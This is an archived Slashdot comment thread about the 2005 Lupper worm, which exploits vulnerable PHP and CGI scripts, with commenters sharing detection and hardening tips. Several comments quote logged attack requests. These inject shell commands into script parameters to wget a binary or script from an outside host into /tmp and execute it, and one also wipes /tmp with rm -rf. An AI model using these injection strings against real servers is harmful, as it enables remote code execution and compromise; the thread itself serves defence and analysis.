Please create an account to participate in the Slashdot moderation system


Forgot your password?
Worms Software Security Linux

Linux Lupper.Worm In the WIld 363

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."
This discussion has been archived. No new comments can be posted.

Linux Lupper.Worm In the WIld

Comments Filter:
  • CONTINUE: (Score:5, Funny)

    by xtracto ( 837672 ) on Tuesday November 08, 2005 @10:51AM (#13978478) Journal
    Next, is a collection of messages telling that it is the fault of the system andministrators and not a problem of the Linux Distributions.

    • Of course, Linux is perfect by definition.

      And I'm sure this worm was written by a Microsoftie or possibly by Bill Gates himself.

      • by rtb61 ( 674572 )
        Only if the worm turns and starts to attack windoze boxen instead, thats the defining nature of redmond code, bugs.
    • Re:CONTINUE: (Score:4, Insightful)

      by freeweed ( 309734 ) on Tuesday November 08, 2005 @11:14AM (#13978690)
      Well, actually, yes. Seeing as no Linux distibution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

      Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.
      • Re:CONTINUE: (Score:3, Interesting)

        by clickster ( 669168 )
        Would you accept the same excuse for IIS?
        • Only partially. (Score:4, Insightful)

          by khasim ( 1285 ) <> on Tuesday November 08, 2005 @12:16PM (#13979197)
          Let's look at this logically.

          If the Linux distribution does not run Apache by default, it is safe.
          If Windows does not run IIS by default, it is safe.
          So far, so good.

          If the Linux distribution does not run PHP by default, it is safe.
          If Windows does not run their scripting system by default, it is safe.
          So far, so good.

          If the Linux distribution does not run those particular scripts by default, it is safe.
          If Windows does not run vulnerable scripts by default, it is safe.
          So far, so good.

          So, both Linux/Apache/PHP/scripts and Windows/IIS/scripting/scripts are as secure as each other in this particular instance.

          Both can be made vulnerable by installing systems/scripts that are not part of the default system.

          But most of the Windows compromises have not been from installing 3rd party vulnerable scripts. Historically, the compromises have come from system vulnerabilities that the admins have not patched, even when the patches are available.

          The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.

          Just because this one type would require the same actions on both systems does not mean that this type can be generalized to all exploits of both systems.
          • Re: The "proof" of which has "better" "security" will be how widespread this worm is compared to slammer or code red or nimda.

            It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...

            If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major

        • Re:CONTINUE: (Score:3, Insightful)

          by budgenator ( 254554 )
          Would you accept the same excuse for IIS?
          FTA I don't see where it a linux worm, or even an appache worm it's primarily attacking php scripts even then it's only capable of attacking php scripts in servers that are configured to allow 2 very well known security configuration flaws and one that's recomemded against. NOTE the windows ME-XP instructions on the page [].
    • Re:CONTINUE: (Score:3, Interesting)

      Well it is nice to know that I am a somewhat responsible administrator, as it seems like I survived an attack. In my logs I was wondering why I was getting random hits on pages such as "xmlrpc.php" when I didn't have any pages named that. This happened 7 days ago by the way, so it must be around that old.

      I find it kind of strange however that if you go to services/xmlrpc.php on my website, you get a webpage that is actually services.html. No services/xmlrpc.php or even services directory exists in my htdoc

  • by Short Circuit ( 52384 ) * <> on Tuesday November 08, 2005 @10:52AM (#13978479) Homepage Journal
    First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

    Second, how do you remove it? Quoth the page:
    Removal Instructions
    AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

    Additional Windows ME/XP removal considerations

    • by TheSpoom ( 715771 ) * <> on Tuesday November 08, 2005 @10:54AM (#13978500) Homepage Journal
      It doesn't say what software it tries to exploit but it does say which scripts. I'd post them here but it would be a waste of space; they're about halfway down on the McAfee page.

      I'd say if your website has one of those scripts I'd look into updating or removing whatever software it is that has the vulnerability.
      • by tomhudson ( 43916 ) <barbara.hudson@b ... u d s o n . c om> on Tuesday November 08, 2005 @10:59AM (#13978552) Journal

        More alarmist shit (and old news at tht - The Reg reported this last week).

        Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

        The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" verison from Microsoft, and BSD/OSX/Linux users don't need an anti-virus.

        • by harlows_monkeys ( 106428 ) on Tuesday November 08, 2005 @11:53AM (#13979012) Homepage
          More alarmist shit (and old news at tht - The Reg reported this last week)

          My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.

          This indicates that this is indeed in the wild, and active, and spreading.

          Thus, it is not alarmist shit.

          • by tomhudson ( 43916 ) <barbara.hudson@b ... u d s o n . c om> on Tuesday November 08, 2005 @12:06PM (#13979115) Journal

            The key word is "attempts".

            Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

            The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.


            1. If you haven't updated your machine in years
            2. If you have those particular scripts installed
            3. If you allow files in /tmp to be run by processes from user "nobody"

            ... that's a LOT of ifs ...

            In other words, nothing to see here but more antivirus vendor fud.

          • by tomhudson ( 43916 ) <barbara.hudson@b ... u d s o n . c om> on Tuesday November 08, 2005 @12:10PM (#13979161) Journal

            I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: []

            Knock yourselves out :-)

          • Looking at the logs for one of my sites (for all of the entries from the mcafee site other than bare directory scans), I'm finding 31 hits from 4 sites with the first being October 6. All seem to have returned 404 errors.

            So, something is hunting for vulnerable scripts (no big shock), but it seems far from rampant.

            on the other hand, a friend of mine runs a multi-hosting site with a couple of hundred customers, and we've had to do multiple sweeps for people running out of date scritpts with holes in them

    • by gowen ( 141411 ) <> on Tuesday November 08, 2005 @10:55AM (#13978513) Homepage Journal
      According to ZDNet/Symantec []
      "The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

      The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."
    • Other links (Score:4, Informative)

      by AndroidCat ( 229562 ) on Tuesday November 08, 2005 @11:04AM (#13978599) Homepage
      Security Focus [] eWeek [] CNet []
      • It's not Windows (Score:5, Informative)

        by max born ( 739948 ) on Tuesday November 08, 2005 @11:19AM (#13978735)
        From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

        Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.
    • by budgenator ( 254554 ) on Tuesday November 08, 2005 @04:39PM (#13981936) Journal
      step one go to securityfocus [] and update all of the applications listed on your system.
      Presence of the following file:
      * /tmp/lupii
      One of the following ports are listening:
              * UDP 7111
              * UDP 7222

      so running su -c"netstat --listening --extend --program" tells you if its even running by listing what listening to any port such as UDP 7111 7222
      then it would be easy to
      su -c"kill -9 pid-of-lupii" su -c"rm /tmp/lupii" su -c"touch tmp/lupii"

      the worm appearent does this
      echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
      so unless your server has a vulnerability that allows privailige escalation from nobody its stuck in tmp directories or possibly in your html directories.
  • by Anonymous Coward on Tuesday November 08, 2005 @10:52AM (#13978480)
    Seems kind of wrong to name it exclusively a linux problem.

  • by ivan256 ( 17499 ) * on Tuesday November 08, 2005 @10:52AM (#13978484)
    Oh, well we've got this PHP worm... Why don't we call it a Linux worm and the press will just eat it up!
    • by jellomizer ( 103300 ) * on Tuesday November 08, 2005 @10:57AM (#13978529)
      Because it seems to only effect Linux and BSD systems (With a different worm). Other systems running PHP are not effected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.
      • by sqlrob ( 173498 ) on Tuesday November 08, 2005 @11:01AM (#13978576)
        IE Worm = Windows worm.

        Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.
        • "according to MS" -> "According to MS when he's interested in not being accused of being a monopoly".

          Microsoft could change their software to enable/disable the IE-dependent functions when IE is installed/uninstalled. Some apps use the ie com thingy (desktop background, html help, explore.exe's web view, media player) which is good, but that doesn't means it can't be removed (furthermore, IE design is ugly, someone can explain why they don't have a common "image format" com/ole/whatever object that deskt
      • Then it should be a Linux/*BSD worm, and even that would still be misleading at best, as PHP is what's the problem here. Yes, it's PHP on specific platforms only, but the hole is in PHP, not Linux or *BSD, so it *should* be called a "PHP worm affecting Linux/*BSD platforms", or something similar.
      • An IE Worm or Outlook Work is absolutely **a windows worm** since they they are all designed by Microsoft and integrated tightly in the OS. Linus didn't write PHP and any Linux distro or BSD's don't require you to install PHP. You are free to install or uninstall PHP. Attributing this worm to Linux is like blaming Windows for an Adobe Acrobat vulnerability.
      • Except the blasted media only calls them "Computer Worms", they do not mention Windows as the problem. That is why everytime one of those stupid announcements make it onto "Good Morning America", I get a call from the boss asking if our servers are safe and everytime, I have to say, that is a Windows problem, not a Linux problem.

            It's annoying that they don't call those Windows Worms/Virus/Trojan attacks...
  • by frankie ( 91710 ) on Tuesday November 08, 2005 @10:53AM (#13978489) Journal
    ...then it's a PHP/*nix worm, not Linux specifically.

    Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.
    • by alexhs ( 877055 ) on Tuesday November 08, 2005 @11:28AM (#13978793) Homepage Journal
      ...then it's a PHP/*nix worm, not Linux specifically.

      Not exactly. From what I understood, there are BSD and Linux variants : both versions are using the same PHP holes, but the binary itself must be Linux or BSD compatible.

      There's a layer available in BSD that allows to run Linux binaries natively, so Linux potentially could infect a BSD system, but it is somewhat like saying an MS-Windows virus could infect a Linux through wine.

      Oh, and while we're at it, aren't these virii more specifically Linux/i386 and BSD/i386 virii ?
  • by Assmasher ( 456699 ) on Tuesday November 08, 2005 @10:54AM (#13978498) Journal
    ...Linux is more and more popular with corporations holding valuable and important data.

    Success is a double-edged sword. ;)
    • by khasim ( 1285 )
      This is not a flaw in Linux. It is a vulnerability in a script written in PHP that a sysadmin may install on a Linux box.

      This has nothing to do with whether "valuable and important data" is stored on a Linux box.

      If Linux was used by 10x more people/systems, there is no reason to believe that we'd see 10x more worms/viruses in the wild.

      Yet every time the topic of a Linux worm/virus/trojan comes up, someone will make a comment about how it will only happen more as Linux becomes more popular.
  • by soren.harward ( 1153 ) on Tuesday November 08, 2005 @10:54AM (#13978505) Homepage
    All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.
  • by xutopia ( 469129 ) on Tuesday November 08, 2005 @10:56AM (#13978520) Homepage
    "If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?
    • by maxwell demon ( 590494 ) on Tuesday November 08, 2005 @11:11AM (#13978648) Journal
      Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

    • by smoking2000 ( 611012 ) <> on Tuesday November 08, 2005 @11:13AM (#13978670)
      The command it runs is:
      |echo;echo YYY;cd /tmp;wget;chmod +x listen;./listen;echo YYY;echo|
      It is passed to in a request like:
      GET /cgi-bin/|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1
      There are also POST request to xmlrpc.php pages, like:
      POST /drupal/xmlrpc.php HTTP/1.1
      So if you have /tmp mounted noexec this should not be a problem.
      • Well, as of 9:30 AM central time isn't accepting connections, so it's either been slashdotted or taken down.
      • a noexec /tmp doesn't protect from running an interpreter with the script source in /tmp. Next version should simply include '/bin/sh /tmp/listen' instead to be fully functional.
      • Per Making /tmp non-executable []:

        Mounting filesystems with these flags set raises the bar a little, but it doesn't stop files from being executed.

        What you need is defense in depth. Mounting /tmp noexec,nosuid helps; Keeping everything up-to-date helps; Scanning your log files, following the news,... You get the idea.

        And of course, hiring someone competent to do all this is a fine idea;)

      • Mounting tmp noexec won't stop scripts like this.

        Aside from keeping a system patched up, it's important on a web server to lock down all programs that aren't necessary for the operation of your web services. In typical setups there is absolutely no reason that the apache user should have to execute wget, although it will be able to by default.
    • Not configuration of apache, but configuration of PHP.

      Basically, it's whether you allow the following:

      A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful).

      #2 is just plain dumb.

      I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least), it's possible that they don't allow "http://" (remote file protocols) in their later releases.

    • Damned slashdot eats my code examples. Re-post.

      It's Not configuration of apache, but configuration of PHP. Basically, it's whether you allow the following:

      $foo = `ls`;

      $bar = include("");

      A lot of people have #1 (since they don't see the difficulty in allowing that, and in some cases it is hella-useful for hacking stuff together).

      #2 is just plain dumb.

      I don't remember what PHP ships with defaults nowadays (I think yes to shell commands at least)
      • #2 is not just dumb, it's also really common. I worked on a site a couple of weeks ago that I was asked to update that had been in production for a while where the guy who wrote it had actually used


        for all of the navigation. Apparently he had been using forms for navigation and had each button holding the value of the file he wanted, and a hidden field holding the full URL to the section of the site. So the code ended up looking l

  • by Anonymous Coward on Tuesday November 08, 2005 @10:56AM (#13978522)
    Paraphrased from the virus description;

    IF you run a specific kernel version with some special module
    AND you run one of a couple specific versions of one package not installed by default
    AND you have a very "generic" config on that package
    AND you have some plugins enabled, but not configured for security
    AND you are on a world routable IP address
    AND you have some specific vulnerable scripts,

    THEN you might need to take a look at if you are at risk.

    Paraphrased from the virus description of most MSFT worms:

    IF you run an MSFT operating system
    AND you havent reformated your HDD in the lsat hour

    THEN its time to pucker up and kiss the sucker goodbye..

    • From the best MS technote EVAR: []

      "Identified security issues in Internet Explorer could allow an attacker to compromise a Windows-based system... This affects all computers with Internet Explorer installed (even if you don't run Internet Explorer as your Web browser)."

      And since MS included IE by default, enabled it by default, and made it almost impossible to uninstall, all you MS defenders are invited to take a long walk off a short pier. BTW, that update is less than 2 years old, so it's not like I'm really
  • Too many ifs (Score:5, Interesting)

    by SolitaryMan ( 538416 ) on Tuesday November 08, 2005 @10:58AM (#13978540) Homepage Journal
    If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

    which in practice means that your admin have died a couple of years ago but was never replaced.
  • Short of detail (Score:5, Informative)

    by QuaintRealist ( 905302 ) <> on Tuesday November 08, 2005 @10:58AM (#13978544) Homepage Journal
    So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:

    "The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

    AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

    Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

    This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?
  • by Mabonus ( 185893 ) on Tuesday November 08, 2005 @10:58AM (#13978545)
    I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

    193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    For 60 hits.
    • I have a variation on this one besides the "flupii" one. This one uses a file called "listen"

      GET /cgi-bin/awstats/|echo;echo%2 0YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2fli sten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216% 2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1

      I think there is also a "scout" part, which finds vulnarable hosts, as I also have requests like this:

      GET /usage/cgi-bin/|echo%20;echo% 20;;echo%20;echo| HTTP/1.1

  • Linux? (Score:2, Interesting)

    by noz ( 253073 )
    I dislike the labelling of this worm as Linux/Slapper. The only platform identification is,
    This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts.
    I also know that tomorrow a colleague will say something akin to, "Quit razzing my Windows platforms. Your precious Linux also has security problems." Grrrr...
  • by PoprocksCk ( 756380 ) <> on Tuesday November 08, 2005 @11:00AM (#13978566) Homepage Journal
    I doubt I'll have the libraries required to run this worm.
  • by handmedowns ( 628517 ) <> on Tuesday November 08, 2005 @11:00AM (#13978572) Homepage []

    Let Mcaffe know how well they're trolling.
  • McAfee sucks for real info, look at symantec [] or at my at summary []. In short: Update your software on time. There are some small inconsistencies between what the worm attacks and what needs to be updated though.
  • by WhiteWolf666 ( 145211 ) <> on Tuesday November 08, 2005 @11:08AM (#13978623) Homepage Journal
    Currently, this worm is only compatible with Linux/BSD systems, because they are the only systems with full shell scripting capabilities.

    It is rumored that you can obtain the same level of compatibility with the Cygwin Suite, but that is not an officially supported configuration by Microsoft.

    Never fear, though, Monad will bring Lupper, and similar PHP/Shell script worms to the Windows platform for the masses!

    Seriously, though; isn't everyone fairly aware that PHP ain't that secure?
  • According to MacAfee its: It is a modified derivative of the Linux/Slapper ...

    And according to a 2002 cert advisory [] the slapper worm appears to work only on Linux systems running Apache with the OpenSSL module (mod_ssl) on Intel architect..

    Surprisingly their seem to be no mention of it a which leads me to think it's pretty benign and not wide spread. I could be wrong.
  • Gnu! (Score:5, Funny)

    by rabel ( 531545 ) on Tuesday November 08, 2005 @11:14AM (#13978692)
    That's Gnu/Linux worm to you, you insensitive clod!
  • If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.

    1. don't permit external shell access through you www accounts. Make all you www accounts shell be /usr/bin/false. I realize that some people need cli access but it should be severly limited in it's functions and only used by those who have a real need.
    2. don't permit
  • by FudRucker ( 866063 ) on Tuesday November 08, 2005 @11:17AM (#13978712)
    if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL
  • Here are some simple things you can do to harden your server. Note that they are not a substitute for actually fixing or removing broken scripts, but they can buy you time.

    • Enable SELinux. However, if you're running these kinds of scripts, you probably aren't protected by SELinux.
    • Mount /tmp with the noexec flag. Again, not complete protection if the malware is a script (because it can be invoked explicitly with the command interpreter), but it would stop this particular one.
    • Change the permissions on
  • Unless I misundersand the article and comments, it seems that

    Safety of Linux user who screws up >> MS user who does everything right
  • sounds to me like an apache with php problem.

    I don't see how that would make it a linux worm. Does this "worm" also work on Solaris, HPUX, AIX, and other apache and php aware operating systems?

    sounds to me like a new version of the old problem.
  • This is probably going to re-occur now that a precedent is set. Prepare for every new PHP exploit that comes out to be bundled with Slapper like this. It will probably become the Rbot of the Linux world.

    Even more sad, the AV companies couldn't even detect that this was 95% Slapper code! C'mon, the kiddie who released this didn't even strip the debug symbols much less pack it in any way.

    With that said, my writeup of the worm is here: []

    Includes some previously unreleas

  • one more thing: accorting to the not-very-fine article, the exploit requires one of the following ports listening: UDP 7111, UDP 7222.

    So, once again, a firewall that blocks EVERYTHING, EXCEPT things you want open (like 80 and 22) will prevent this, right? Seems to me that slapper (which affected Apache with mod_ssl and 443 open, IIRC) was much more dangerous.
  • by Anonymous Coward on Tuesday November 08, 2005 @11:36AM (#13978868)
    I checked my logs and found the following:
    [06/Nov/2005:18:13:39 -0500] "GET /stats/awstats/|echo%20;cd%20 /tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20membe;perl%20a.txt;echo%20;rm% 20-rf%20a.txt*;echo| HTTP/1.1" 404 1030 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    Why not get somebody to shut down
  • by Alioth ( 221270 ) <no@spam> on Tuesday November 08, 2005 @11:38AM (#13978887) Journal
    Well, firstly, I doubt this worm will be particularly widespread - the vast majority of sites use name-based virtual hosting, and this worm just uses the IP address. Obviously some systems (with the very outdated versions of the vulnerable programs) will be vulnerable. But this isn't really the point of what I'm thinking about.

    The point is that if you run a server (of any OS) you can take preventative measures to stop the propagation of hacks/malware/trojans, even if you have users who install buggy PHP scripts. Some straightforward preventative measures are:

    1. Ensure that the 'wget' (and any other similar utilities) command is NOT available to the user which cgi/php scripts are run as. Many hackers use an initial exploit to get into the machine, then wget the script or program they really want to run (such as the good old bindshell)
    2. Mount /tmp (and anything else writeable by the script) no-exec (although there are ways around this, it will defeat many skript kiddies).
    3. Implement rate limiting on the MTA that runs on the machine. Have the MTA shut down altogether if the mail queue is gigantic. This way, if someone does get in, and tries to spam with your machine, it won't get very far. It will also give you time to investigate the problem.
    4. Use iptables! Only open ports that should be open. Also, use *egress* filtering too. If your server should not be contacting anything on port 80, say, except the Debian distro servers for apt, use iptables to stop outbound access to anything except those servers. Prevent all outbound access except where strictly needed.
    5. Treat every local root exploit as if it was a remote root exploit. If you run a web server, there is *no such thing* as a local root exploit. All it takes is a buggy PHP script, and an attacker can try and elevate their privileges through the local root exploit.

    Those 4 things will keep you safe against most of these cookie-cutter or skript kiddie attacks. But to go further:
    6. Use SElinux to only allow Apache to access what it should access and nothing else. Particularly executables. Therefore, if someone manages to successfully wget their exploit script after exploiting the buggy PHP script, they can't actually run it because SElinux will prevent it from being run.
    7. Use Xen to divide your server up. Put the web server (the most complex and most likely to be exploited) in a separate Xen-U instance to everything else. Then you can make sure that the only stuff installed on the instance is stuff strictly needed to run the web sites. You can also do much more agressive filtering with iptables - so for instance, if you put the MTA on another Xen-U, plus all the other services you need (DNS etc). you can make it so the web server needs to have no egress *at all* except via the services on the other xen-U. This makes it essentially impossible for someone to use an exploit to download and run another script on your web server - they can't even change the port number of their webserver (say, to 25) to allow them to get the file they need.

    I have had two serious attempts (i.e. NOT skript kiddies - the most recent one was a Romanian phishing group) to hack my (multi-user, shared hosting) web server in the last couple of years. They were both defeated by at least one of these techniques, and I learned from each. My web server is now divided into multiple Xen instances, and the HTTP server part has very strict egress rules.
  • by Biff Stu ( 654099 ) on Tuesday November 08, 2005 @11:42AM (#13978922)
    It's not quite lunch, it's not quite supper; let's call it lupper!
  • by Christianfreak ( 100697 ) on Tuesday November 08, 2005 @03:21PM (#13981084) Homepage Journal
    I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.

    Between this and the SSH worm, maybe its time to investigate using Windows ME with Personal Web Server. :-D

"For a male and female to live continuously together is... biologically speaking, an extremely unnatural condition." -- Robert Briffault